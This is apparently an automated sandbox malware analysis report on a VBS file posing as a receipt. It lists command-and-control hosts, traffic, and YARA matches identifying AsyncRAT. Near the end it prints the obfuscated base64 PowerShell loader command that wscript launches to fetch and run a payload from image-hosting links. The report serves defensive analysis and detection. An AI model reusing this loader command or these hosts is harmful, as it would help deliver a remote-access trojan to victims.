Windows Analysis Report
S847453-receipt.vbs

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: xwormay8450.duckdns.org

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Uses dynamic DNS services

Source: unknown

DNS query: name: xwormay8450.duckdns.org

Source: global traffic

TCP traffic: 192.168.2.4:49741 -> 12.221.146.138:8450

Source: escudellar.vbs.8.dr	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
Source: escudellar.vbs.8.dr	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4

Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /nm/xwomay.txt HTTP/1.1Host: www.evolve27.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 172.67.187.200 172.67.187.200
Source: Joe Sandbox View	IP Address: 172.67.187.200 172.67.187.200
Source: Joe Sandbox View	IP Address: 104.21.45.138 104.21.45.138
Source: Joe Sandbox View	IP Address: 12.221.146.138 12.221.146.138

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: ATT-INTERNET4US ATT-INTERNET4US
Source: Joe Sandbox View	ASN Name: SS-ASHUS SS-ASHUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

HTTP traffic detected: GET /d/Pz7Nj HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /d/Pz7Nj HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /nm/xwomay.txt HTTP/1.1Host: www.evolve27.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: paste.ee
Source: global traffic	DNS traffic detected: DNS query: uploaddeimagens.com.br
Source: global traffic	DNS traffic detected: DNS query: www.evolve27.com
Source: global traffic	DNS traffic detected: DNS query: xwormay8450.duckdns.org

Source: wscript.exe, 00000000.00000002.1885694563.000001A860220000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1666302244.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879538877.000001A85E509000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1856696221.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879175290.000001A860222000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1856630795.000001A86023C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879196524.000001A85E4ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1855839456.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665749382.000001A860230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665816178.000001A85E509000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665865168.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878753795.000001A85E58C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884599780.000001A860225000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1885383536.000001A85E58C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1885713037.000001A860225000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1877954656.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879515265.000001A860250000.00000004.00000020.00020000.00000000.sdmp, S847453-receipt.vbs	String found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspx
Source: wscript.exe, 00000000.00000003.1878753795.000001A85E58C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1885383536.000001A85E58C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspxW
Source: wscript.exe, 00000000.00000003.1666302244.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1856696221.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1855839456.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665865168.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1877954656.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879515265.000001A860250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspxd
Source: wscript.exe, 00000000.00000003.1666634236.000001A86022A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1666264631.000001A860224000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspxelp_
Source: wscript.exe, 00000000.00000002.1885341405.000001A85E53D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878557421.000001A85E53C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspxoG2
Source: powershell.exe, 00000007.00000002.2642487198.000001C590071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.2281228806.000001C580223000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2812838257.000002090009E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2281228806.000001C580001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.2281228806.000001C580223000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2812838257.0000020900059000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000003.00000002.2812838257.000002090006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2281228806.000001C580001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: wscript.exe, 00000000.00000002.1885383536.000001A85E55C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884250357.000001A8605F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886174848.000001A8605FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 00000000.00000002.1885383536.000001A85E55C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884250357.000001A8605F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886174848.000001A8605FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: wscript.exe, 00000000.00000002.1885383536.000001A85E55C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884250357.000001A8605F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886174848.000001A8605FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 00000000.00000002.1885383536.000001A85E55C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884250357.000001A8605F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886174848.000001A8605FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000007.00000002.2642487198.000001C590071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.2642487198.000001C590071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.2642487198.000001C590071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: wscript.exe, 00000000.00000002.1885383536.000001A85E55C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884250357.000001A8605F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886174848.000001A8605FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 00000000.00000002.1885383536.000001A85E55C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884250357.000001A8605F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886174848.000001A8605FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000007.00000002.2281228806.000001C580223000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: wscript.exe, 00000000.00000002.1886130177.000001A8605D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878261147.000001A8605CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000007.00000002.2642487198.000001C590071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 00000000.00000003.1878261147.000001A8605AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886063034.000001A8605AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/
Source: wscript.exe, 00000000.00000003.1878261147.000001A8605AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886063034.000001A8605AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/;
Source: wscript.exe, 00000000.00000002.1885694563.000001A860220000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886130177.000001A8605D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1856630795.000001A86023C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878261147.000001A8605CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879378362.000001A8605A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1856696221.000001A86024C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879106103.000001A8605A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1885998798.000001A8605A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878532060.000001A860599000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/Pz7Nj
Source: wscript.exe, 00000000.00000002.1885271657.000001A85E531000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879196524.000001A85E531000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879538877.000001A85E531000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/Pz7Njec1
Source: wscript.exe, 00000000.00000003.1666302244.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879538877.000001A85E509000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1856696221.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879196524.000001A85E4ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1855839456.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665749382.000001A860230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1666634236.000001A86022A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665816178.000001A85E509000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665865168.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1666264631.000001A860224000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1877954656.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879515265.000001A860250000.00000004.00000020.00020000.00000000.sdmp, S847453-receipt.vbs	String found in binary or memory: https://pastzangam.zangamzangam/d/Pz7Nj
Source: wscript.exe, 00000000.00000003.1666302244.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1856696221.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1855839456.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665865168.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1877954656.000001A86024E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879515265.000001A860250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastzangam.zangamzangam/d/Pz7NjC
Source: wscript.exe, 00000000.00000002.1885383536.000001A85E55C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884250357.000001A8605F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886174848.000001A8605FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: wscript.exe, 00000000.00000002.1885383536.000001A85E55C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884250357.000001A8605F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886174848.000001A8605FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000007.00000002.2281228806.000001C580223000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000007.00000002.2281228806.000001C580001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
Source: wscript.exe, 00000000.00000002.1885383536.000001A85E55C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884250357.000001A8605F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886174848.000001A8605FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: wscript.exe, 00000000.00000002.1885383536.000001A85E55C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884250357.000001A8605F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886174848.000001A8605FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: wscript.exe, 00000000.00000002.1885383536.000001A85E55C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1884250357.000001A8605F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1886174848.000001A8605FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1878965975.000001A8605EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1879985688.000001A8606E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.45.138:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 131.153.147.50:443 -> 192.168.2.4:49739 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2972228650.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3916, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6276, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8806
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8806			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDg